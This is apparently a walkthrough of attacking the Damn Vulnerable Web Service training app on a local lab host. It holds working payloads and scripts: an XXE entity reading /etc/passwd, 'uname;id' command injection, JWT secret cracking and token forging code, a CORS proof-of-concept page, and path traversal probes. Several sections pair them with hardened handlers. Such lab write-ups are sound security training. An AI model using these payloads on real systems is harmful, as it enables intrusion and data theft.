Damn Vulnerable Web Service


Last updated 1 year ago

General info, Get it and deploy it

Infos

List of Vulnerabilities

This is the list from the documentation. To keep track, I will check each one off every time I find it.

Deploy it

  • git clone https://github.com/snoopysecurity/dvws-node.git

  • cd dvws-node

  • docker compose up

  • It should start building.

  • Once done, edit your /etc/hosts file and add this line: 127.0.0.1 dvws.local

  • All the other information we need is in the startup output:

web-1         | 🚀 XML-RPC server listening on port 9090
web-1         | 🚀 API listening at http://dvws.local (127.0.0.1)
web-1         | 🚀 GraphQL Server ready at http://localhost:4000/

Hack it

  • Launch Burp or ZAP and set up your scope settings.

Exploration

Register

Now we can visit http://dvws.local/ and we get the login page.

Let's create an account.

Once logged in we get the home page.

However, we do not need to be logged in to access the home page: it can be reached directly at http://dvws.local/home.html

File upload functionality

At http://dvws.local/upload.html we have the possibility to upload files, so this is definitely something to keep aside for later.

PassPhrase Generator

Another page to keep for later exploration: http://dvws.local/passphrasegen.html

Public Notes

Another one: http://dvws.local/search.html

Admin Area

We can access the admin area as well, without any cookie: http://dvws.local/admin.html

Save Secret Note

This looks fun too: http://dvws.local/notes.html

If we try to create a note without a token it won't work (the request fails with a 500 error). So we can access the page, but we cannot write notes.

Directory and endpoint enumeration

  • Directory enum small list

┌─[✗]─[gabrielle@parrot]─[~/vulnerable-apis/dvws-node/dvws-node]
└──╼ $wfuzz -c --hc 404 --hw 225 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt http://dvws.local/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dvws.local/FUZZ
Total requests: 87664

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                              
=====================================================================

000000164:   301        10 L     16 W       181 Ch      "uploads"                                                                                            
000000269:   301        10 L     16 W       179 Ch      "static"                                                                                             
000000549:   301        10 L     16 W       173 Ch      "css"                                                                                                
000000954:   301        10 L     16 W       171 Ch      "js"                                                                                                 
000008156:   301        10 L     16 W       173 Ch      "CSS"                                                                                                
000009299:   301        10 L     16 W       171 Ch      "JS"                                                                                                 

Total time: 63.89374
Processed Requests: 87664
Filtered Requests: 87658
Requests/sec.: 1372.027
  • Directory enum, big list

=> Nothing more than with the small one.

When I explored, I saw that the schema for the API was /api/v2 (I found it in my Burp history). This is good to know: it gives us the schema of the API endpoints.

  • Let's try another wordlist; I really want to find the documentation. This time I will use Intruder with the wordlist swagger.txt.

  • Here is my Positions tab in Intruder. Notice that I did not put a / after the GET HTTP verb.

  • My Payloads tab looks like this. Make sure to uncheck "URL-encode these characters" at the bottom.

Then we can launch the attack. Ordering the results by Status, we get two endpoints worth checking.

Both endpoints serve the documentation:

  • http://dvws.local/api-docs/

  • http://dvws.local/api-docs/swagger.json

Mass assignment

  • To create an admin user, we add the parameter admin to the registration request and set it to true: admin=true

  • It works: our new user is admin.

Information disclosure

In our Burp history we have a users endpoint that returns the list of users together with their password hashes.

With this information we can attempt to crack the admin hash. First let's find out which hash type it is: on the hashcat example hashes page, searching for $2b$10 shows that it is bcrypt. Now we can crack the hash with john (or hashcat) and we get the admin user's password: letmein.

So now we can log in as admin.

Horizontal Access Control

When we access our passphrases, the application calls the endpoint /api/v2/passphrase/csbygb, so it uses the username as the id. We can therefore try to access the admin one: /api/v2/passphrase/admin It works! The funny thing here is that we do not even need a cookie to access it.

Note: I added a passphrase myself for the sake of the demo here.

Vertical Access Control Issues

When we try to access the admin area with a normal user through the browser we get redirected. With an admin user, however, the browser calls the endpoint /api/v2/sysinfo/uname and shows the admin page.

So we can try to access the same endpoint with a user token.

  • Access with the admin token

This is the legitimate request: we get information about the server.

  • Access with the user token

This should not be possible: we access admin info with a user token.

The user-search functionality behaves the same way. In the browser it calls an endpoint, and the request and response look like this in Burp.

We can send the request to Repeater and swap the token for a user one to see whether we can access the "admin" user's info, for example. And it works!

Cross Site Scripting

If we enter a username containing an XSS payload in the user field, the input is not sanitized and our payload is interpreted.

Now if we click on login we get our pop-up.

JSON Web Token (JWT) Secret Key Brute Force

Let's play a little with the JWT. For this we can use jwt_tool (see its README for how to install it). We can brute-force the secret with this command: python3 jwt_tool.py <JWT-TOKEN-HERE> -o -C -d /usr/share/wordlists/rockyou.txt It works and we get the key: access

Once we have the key we can re-sign the token with updated rights and become admin by adding a permission: here we add the permission "user:admin". We can do this on jwt.io or with jwt_tool's tamper mode.

Then we just have to use this newly generated token to access admin resources.
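As an added example (not from the original write-up, and not jwt_tool's or DVWS's code), here are the same two steps done by hand in Python: brute-force the HS256 secret against a wordlist, then re-sign the token with an extra permission. The sample token, its claim names ("username", "permissions") and the short wordlist are constructed for the demo; only the weak secret access and the permission user:admin come from the page.

```python
# Added example: offline HS256 secret brute force + token re-signing.
# Not DVWS's or jwt_tool's code; claim names are assumptions.
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Builds header.payload.signature with HMAC-SHA256 over the first two parts."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """Recomputes the signature with the candidate secret and compares in constant time."""
    h, p, s = token.split(".")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def crack_secret(token: str, wordlist):
    """What jwt_tool -C -d does: the first candidate reproducing the signature, else None."""
    for candidate in wordlist:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge_with_permission(token: str, secret: str, permission: str) -> str:
    """Tamper step: add a permission to the payload and re-sign with the cracked key."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    perms = payload.setdefault("permissions", [])   # claim name is an assumption
    if permission not in perms:
        perms.append(permission)
    return sign_hs256(header, payload, secret)


# Constructed sample: a token as the app might issue it to a normal user,
# signed with the weak secret the page recovered ("access").
SAMPLE_SECRET = "access"
SAMPLE_TOKEN = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"username": "csbygb", "permissions": ["user:read"]},
    SAMPLE_SECRET,
)
SAMPLE_WORDLIST = ["123456", "password", "letmein", "access", "secret"]

if __name__ == "__main__":
    key = crack_secret(SAMPLE_TOKEN, SAMPLE_WORDLIST)
    print("recovered secret:", key)
    admin_token = forge_with_permission(SAMPLE_TOKEN, key, "user:admin")
    print("forged token:", admin_token)
    print("forged payload:", json.loads(b64url_decode(admin_token.split(".")[1])))
```

This is why a guessable HS256 secret is fatal: the signature is just an HMAC over the header and payload, so whoever holds the key can mint any claims the server will accept. With rockyou.txt the loop is the same, only longer.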

XML External Entity Injection (XXE)

When playing with the user search we saw that the request body is XML, so this is definitely the place to check for XXE. Let's insert these lines at the top of the body:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Then we reference the entity with &xxe; inside the username tag to have the file we want (here /etc/passwd) printed back in the response.

And it works: we get the passwd file of the server.

Insecure Direct Object Reference

When playing with the notes, each secret note we create gets a number. Here we have note no 4 and note no 9.

The endpoint /api/v2/notes returns all of our notes. Let's check whether the endpoint can also return a single note when given this number as an id: /api/v2/notes/note-number And it works: we can access any note from any user. For example, here is a note belonging to csbygb, retrieved with the token of csbygb-otheruser.

After this we could enumerate all the notes with an automated tool, Burp Intruder for example, by incrementing the note number.
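The mass assignment, vertical access control and IDOR findings above are all the same server-side mistake: the handler authenticates the token but never checks what that user is allowed to do. As an added example (not DVWS's code; usernames, field names and the in-memory stores are made up), here is a minimal model of each handler next to a hardened version, and a demo() that replays the three attacks against both.

```python
# Added example: three authorization bugs modelled in memory, each beside a fix.
# Not DVWS's code; every name and token here is made up for the demo.
import itertools
import secrets

USERS = {}        # username -> user record
NOTES = {}        # note number -> {"owner": username, "body": text}
TOKENS = {}       # bearer token -> username
_note_no = itertools.count(1)


# --- Mass assignment ------------------------------------------------------
def register_vulnerable(body: dict) -> dict:
    """Copies every field from the request body, so {"admin": true} sticks."""
    user = {"username": body["username"], "admin": False}
    user.update(body)                      # client controls the privilege flag
    USERS[user["username"]] = user
    return user


def register_hardened(body: dict) -> dict:
    """Takes only allowlisted fields; privilege flags stay server-controlled."""
    user = {k: body[k] for k in ("username", "password") if k in body}
    user["admin"] = False
    USERS[user["username"]] = user
    return user


# --- Session helpers ---------------------------------------------------------
def login(username: str) -> str:
    token = secrets.token_hex(8)
    TOKENS[token] = username
    return token


def current_user(token: str):
    username = TOKENS.get(token)
    return USERS.get(username) if username else None


# --- Vertical access control (/sysinfo/uname) -------------------------------
def sysinfo_vulnerable(token: str):
    """Authenticates but never authorises: any valid token reaches admin data."""
    if current_user(token) is None:
        return 401, None
    return 200, "Linux dvws (sample output)"


def sysinfo_hardened(token: str):
    user = current_user(token)
    if user is None:
        return 401, None
    if not user.get("admin"):
        return 403, None                   # role check the original lacks
    return 200, "Linux dvws (sample output)"


# --- IDOR (/notes/<number>) ---------------------------------------------------
def create_note(token: str, body: str) -> int:
    no = next(_note_no)
    NOTES[no] = {"owner": current_user(token)["username"], "body": body}
    return no


def get_note_vulnerable(token: str, no: int):
    """Looks the note up by number only: any user's note is readable."""
    if current_user(token) is None:
        return 401, None
    note = NOTES.get(no)
    return (200, note["body"]) if note else (404, None)


def get_note_hardened(token: str, no: int):
    user = current_user(token)
    if user is None:
        return 401, None
    note = NOTES.get(no)
    if note is None or note["owner"] != user["username"]:
        return 404, None                   # same answer either way: no oracle
    return 200, note["body"]


def demo() -> dict:
    """Replays the three attacks against both variants; returns what each returned."""
    USERS.clear(); NOTES.clear(); TOKENS.clear()
    evil_signup = {"username": "csbygb", "password": "x", "admin": True}
    via_vuln = register_vulnerable(evil_signup)["admin"]
    via_hard = register_hardened(dict(evil_signup, username="csbygb2"))["admin"]
    register_hardened({"username": "admin", "password": "letmein"})
    USERS["admin"]["admin"] = True         # provisioned server-side, not via signup
    user_tok, admin_tok = login("csbygb2"), login("admin")
    secret_no = create_note(admin_tok, "admin's secret note")
    return {
        "mass_assignment_vulnerable": via_vuln,
        "mass_assignment_hardened": via_hard,
        "sysinfo_vulnerable": sysinfo_vulnerable(user_tok)[0],
        "sysinfo_hardened": sysinfo_hardened(user_tok)[0],
        "idor_vulnerable": get_note_vulnerable(user_tok, secret_no)[0],
        "idor_hardened": get_note_hardened(user_tok, secret_no)[0],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:28} {value}")
```

The hardened note handler returns 404 for both "does not exist" and "not yours" on purpose: a 403 would still let Intruder enumerate which note numbers exist.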

NoSQL Injection

If we play with the quotes and try some NoSQL payloads (plenty are available online), we can trigger a NoSQL injection on the endpoint /api/v2/notesearch. It works and we get all the notes, including the secret ones.

Hidden API Functionnality Exposure

If we analyze the swagger we found during the enumeration phase, we see an endpoint that differs from all the others: /api/v1/info. This is an old functionality. Well, let's try it: it discloses a lot of information about the server.

Server Side Request Forgery

The error page has an interesting response: it lists the service's methods.

If we try the request from the article we get a less verbose response, but it is still really interesting.

We can see dvws.checkuptime in the error, and there is also a pingback method. So let's try the service mentioned in the error.

This way we can reach applications running on the server's internal network. We could also use it to scan ports.

CORS

When we explored the application we found a few requests that did not need any token or credentials.

For example /api/v2/passphrase/admin, which returns the passphrase of the user called admin.

See here: we do not need any credentials, and we have Access-Control-Allow-Credentials: true in the response header.

So let's try a CORS PoC to see if it is vulnerable. We can find plenty of PoCs online (I found mine there). If you are not familiar with CORS, the PortSwigger page on the subject is very helpful to learn more about it.

<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Get passphrase</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response both in a pop-up and in the page
      alert(this.responseText);
      document.getElementById("demo").innerText = this.responseText;
    }
  };
  // Cross-origin request to the vulnerable endpoint, sending the victim's cookies along
  xhttp.open("GET", "http://dvws.local/api/v2/passphrase/admin", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</center>
</body>
</html>

And here we get the passphrase.

Note that because this endpoint needs no credentials at all, the passphrase leaks to any origin whatever the CORS policy says. Access-Control-Allow-Credentials: true only matters together with an Access-Control-Allow-Origin that reflects the attacker's origin: that combination is what lets an authenticated endpoint be read with the victim's cookies, so check both headers before reporting a CORS issue rather than an unauthenticated endpoint.

JSON Hijacking

You can check the explanation of this vulnerability in the official writeup.

SQL Injection

You can find the official writeup for the SQL injection in the resources below.

Command Injection

When we explored we found an endpoint (/api/v2/sysinfo/uname) that runs uname on the server. This screams command injection. If we send this instead, we can indeed execute another command: /api/v2/sysinfo/uname;id

We can see that our user is root. From here the next step would be to try to get a reverse shell.
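As an added example (not DVWS's code; the route is modelled as a plain function taking the URL segment), here is the handler pattern behind this bug, a hardened version that maps the segment to a fixed argv through an allowlist, and a probe that checks which classic separators get a second command executed under each variant.

```python
# Added example: command injection via a URL segment handed to a shell, and the fix.
# Not DVWS's code; the handler is modelled as a function of the path segment.
import subprocess

# Hardened handler: the URL segment selects an argv, it never becomes shell text.
ALLOWED_COMMANDS = {
    "uname": ["uname", "-a"],
}

# Separators the write-up's "uname;id" trick relies on, plus the usual alternatives.
PROBES = ["uname;id", "uname|id", "uname&&id", "uname\nid"]


def sysinfo_vulnerable(segment: str) -> str:
    """Models a handler doing exec(segment): the whole segment is a shell line."""
    result = subprocess.run(segment, shell=True, capture_output=True, text=True)
    return result.stdout


def sysinfo_hardened(segment: str) -> str:
    """Allowlist lookup; unknown segments (including anything with ';') are refused."""
    argv = ALLOWED_COMMANDS.get(segment)
    if argv is None:
        raise ValueError(f"unsupported command: {segment!r}")
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def working_separators(handler) -> list:
    """Which probes got `id` to run (its output contains 'uid=') under handler."""
    hits = []
    for probe in PROBES:
        try:
            if "uid=" in handler(probe):
                hits.append(probe)
        except ValueError:
            pass
    return hits


if __name__ == "__main__":
    print("vulnerable:", working_separators(sysinfo_vulnerable))
    print("hardened:  ", working_separators(sysinfo_hardened))
```

Note that the fix is not escaping: with a list argv and no shell, the user never supplies an operand at all, which is the only robust answer when the parameter is the command name itself.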

XPATH Injection

To show the version on the home page, the application calls this endpoint: /api/v2/release/0.0.1 If we append a quote to the end, we get an XPath error.

We can then try a few payloads from hacktricks.

And it works: we get the full config file. The version was read from a config file, which also contains passwords.

XML-RPC user enumeration

There is an endpoint that allows checking whether a user exists; it uses XML-RPC (the dvwsuserservice service).

We can also see the use of xmlrpc in the User-Agent, so we could try to interact with it: XML-RPC is known for a few vulnerabilities that affected a lot of WordPress websites, as the linked article mentions.

Open redirect

When we log out, the application sends a GET request to this endpoint: /api/v2/users/logout/dvws.local This simply redirects to the host given in the path, as we can see here.

What if we replace dvws.local with another URL? Well, it redirects us to that URL.

Path traversal

When we download a file, the application makes a POST request to this endpoint: /api/download Download forms are classic candidates for path traversal, so let's tamper with this request.

The first try fails, but we even get an error telling us where we are in the directory tree.

Let's try a few more dots and slashes.

We are getting there.

And it works!
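As an added example (not DVWS's code), here is what the "a few more dots and slashes" loop looks like when automated, against a download handler built on naive path joining and against one that resolves the path and checks it stays under the served directory. The directory layout and file contents are constructed in a temporary folder so the script runs offline.

```python
# Added example: path traversal against a naive download handler, and the fix.
# Not DVWS's code; the directory tree below is constructed for the demo.
import os
import tempfile


def build_sample_tree():
    """Constructs <root>/app/uploads (the served folder) and <root>/etc/passwd (the target)."""
    root = tempfile.mkdtemp(prefix="dvws-demo-")
    uploads = os.path.join(root, "app", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "report.pdf"), "w") as f:
        f.write("%PDF sample upload\n")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed, not the host's file
    return root, uploads


def vulnerable_download(uploads_dir: str, requested: str):
    """Mirrors path.join(uploads, req.body.file): every ../ is honoured."""
    path = os.path.join(uploads_dir, requested)
    if not os.path.isfile(path):
        # verbose error that leaks the resolved location, like the one seen above
        return 404, f"no such file: {os.path.normpath(path)}"
    with open(path) as f:
        return 200, f.read()


def safe_download(uploads_dir: str, requested: str):
    """Resolves symlinks and ../ first, then refuses anything outside uploads_dir."""
    base = os.path.realpath(uploads_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return 400, "invalid file name"
    if not os.path.isfile(target):
        return 404, "not found"
    with open(target) as f:
        return 200, f.read()


def probe_depth(download, uploads_dir: str, target="etc/passwd", max_depth=8):
    """Tries ../ x1, x2, ... like the manual attempts; returns (depth, body) or None."""
    for depth in range(1, max_depth + 1):
        status, body = download(uploads_dir, "../" * depth + target)
        if status == 200:
            return depth, body
    return None


if __name__ == "__main__":
    root, uploads = build_sample_tree()
    print("vulnerable:", probe_depth(vulnerable_download, uploads))
    print("hardened:  ", probe_depth(safe_download, uploads))
    print("legit file:", safe_download(uploads, "report.pdf"))
```

The depth that finally works tells you how deep the served folder sits, which is exactly the information the verbose 404 above handed out for free. The hardened handler compares realpath results, so encoded or symlinked variants of ../ fail the same way.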

Unsafe Deserialization

The linked article shows an example of insecure deserialization in Node.js. The request to /api/v2/export sends a serialized object to the server; this is how it fetches the requested document. What if we tried to request something else, something we should not be able to access?

Resources

  • Official repo dvws
  • jwt.io
  • hacktricks
  • OWASP API Security Top 10
  • OWASP Security Testing v3